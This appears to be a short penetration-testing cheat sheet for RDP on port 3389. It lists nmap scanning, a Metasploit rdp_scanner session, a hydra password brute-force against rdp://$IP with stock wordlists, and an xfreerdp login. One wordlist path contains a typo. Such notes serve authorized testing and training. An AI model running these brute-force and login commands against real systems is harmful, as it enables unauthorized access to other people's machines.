PORT STATE SERVICE
3389/tcp open ms-wbt-server
nmap --script="rdp-*" -T4 -p 3389 -sV $IP -oN recon/rdp_port
msfconsole
msf5 > use auxiliary/scanner/rdp/rdp_scanner
msf5 auxiliary(scanner/rdp/rdp_scanner) > set RHOSTS $IP
msf5 auxiliary(scanner/rdp/rdp_scanner) > set RPORT $port
msf5 auxiliary(scanner/rdp/rdp_scanner) > run
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-frramework/data/wordlists/unix_passwords.txt rdp://$IP
xfreerdp /u:$username /p:$password /v:$IP:$port